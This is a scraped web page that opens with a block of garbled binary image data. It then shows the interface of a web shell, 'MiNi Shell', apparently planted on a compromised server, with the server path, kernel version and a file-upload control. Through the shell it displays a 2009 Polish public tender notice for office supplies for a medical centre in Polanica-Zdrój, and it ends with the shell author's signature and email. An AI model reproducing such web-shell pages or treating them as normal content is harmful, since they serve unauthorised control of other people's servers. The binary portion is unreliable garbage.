JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090205/18356-N-2009.html

<p class="kh_header"><b>Polanica-Zdrój: Zakup i dostawy artykułów papierniczych dla potrzeb SCM SP ZOZ w Polanicy Zdroju</b><br>
<b>Numer ogłoszenia: 18356 - 2009; data zamieszczenia: 05.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalistyczne Centrum Medyczne , ul. Jana Pawła II 2, 57-320 Polanica-Zdrój, woj. dolnośląskie, tel. 074 8621101, 8621121, faks 074 8621102.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.scm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawy artykułów papierniczych dla potrzeb SCM SP ZOZ w Polanicy Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa artykułów papierniczych i biurowych. Zakres zamówienia poniżej 14 tyś. euro..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 21.12.00.00-0, 22.80.00.00-8, 30.19.20.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu Zamawiający wymaga wniesienia wadium. 
Pakiet 1 -          370,00 zł                
Pakiet 2 -          210,00 zł                
Pakiet 3 -          320,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy, którzy:
Posiadają uprawnienia do wykonywania określonej działalności lub czynności (jeżeli ustawy nakładają obowiązek posiadania takich uprawnień),
Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
Nie podlegają wykluczeniu z postępowania o udzielenia zamówienia,
Złożą do prowadzonego postępowania ważną ofertę podpisaną przez osobę do tego uprawnioną (co wynika z KRS lub dołączonego do oferty pełnomocnictwa), nie podlegającą odrzuceniu na podstawie art. 89, ust. 1 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 roku, z późniejszymi zmianami, 
o udzielenie zamówienia mogą ubiegać się samodzielnie lub wspólnie.
Wykonawcy przystępujący wspólnie do prowadzonego postępowania działają na podstawie art. 23 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 roku, z późniejszymi zmianami.
Ocena spełniania warunków udziału w postępowaniu polegać będzie na sprawdzeniu przez Zamawiającego, czy złożona przez Wykonawcę oferta zawiera wszystkie wymagane oświadczenia i dokumenty wymienione  w rozdziale VII SIWZ (wynikające z art. 22, 24 i 44 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 roku z uwzględnieniem ustawy z dnia 7 kwietnia 2006 r. o zmianie ustawy Prawo zamówień publicznych oraz Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form , w  jakich te dokumenty mogą być składane) oraz czy została podpisana przez osobę do tego uprawnioną..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający żąda aby Wykonawcy przystępujący do postępowania złożyli następujące oświadczenia:
Oświadczenia w trybie art. 22 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 roku z uwzględnieniem ustawy z dnia 7 kwietnia 2006 r. o zmianie ustawy Prawo zamówień publicznych, załącznik nr 3.
Oświadczenia w trybie art. 24 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 roku z uwzględnieniem ustawy z dnia 7 kwietnia 2006 r. o zmianie ustawy Prawo zamówień publicznych, załącznik nr 4.
Oświadczenie w trybie art. 36, ust. 4 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 roku z uwzględnieniem ustawy z dnia 7 kwietnia 2006 r. o zmianie ustawy Prawo zamówień publicznych, załącznik nr  5.
Oświadczenie w trybie art. 44 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 roku z uwzględnieniem ustawy z dnia 7 kwietnia 2006 r. o zmianie ustawy Prawo zamówień publicznych, załącznik nr 6.
Celem potwierdzenia spełniania warunków udziału w postępowaniu Zamawiający na podstawie art. 26, ust. 1 żąda przedłożenia w składanej ofercie następujących dokumentów:
Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24, ust. 1, pkt. 4-8 (ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 roku z uwzględnieniem ustawy z dnia 7 kwietnia 2006 r. o zmianie ustawy Prawo zamówień publicznych), wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24, ust. 1, pkt. 9 (ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 roku z uwzględnieniem ustawy z dnia 7 kwietnia 2006 r. o zmianie ustawy Prawo zamówień publicznych), wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością  dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że dostawy te zostały wykonane należycie. Zamawiający żąda dostarczenia w złożonej ofercie minimum 2 dokumentów potwierdzających należyte wykonanie dostaw.
Poza wymienionymi wyżej oferta musi zawierać następujące dokumenty:
Oświadczenie Wykonawcy o nie zaleganiu w opłacaniu podatków 
Oświadczenie Wykonawcy o nie zaleganiu w opłacaniu składek na ubezpieczenia zdrowotne i społeczne.
Uzupełniony druk ofertowy
Wypełniony formularz asortymentowo-cenowy w formie wydruku i elektronicznej (dyskietka lub płyta CD w formacie Excell)
Zaakceptowany projekt umowy.
Potwierdzenie wpłaty wadium
Ulotki,  katalogi, broszury lub etykiety producenta tematycznie związane ze składaną ofertą (na cały asortyment objęty pakietem), które muszą swoją zawartością  potwierdzać spełnianie wszystkich wymogów zawartych w załączniku nr 1 do siwz..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.scm.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można uzyskać na pisemny wniosek Wykonawcy: 
w siedzibie Zamawiającego, pok. 2/AZ/42, lub drogą pocztową,   pobierając ze strony internetowej www.scm.pl, cena za  SIWZ wynosi 20,00 zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2009 godzina 11:00, miejsce: Kancelaria Specjalistycznego Centrum Medycznego SP ZOZ w Polanicy Zdroju, ul. Jana Pawła II 2, 57-320 Polanica Zdrój.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 17.03.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com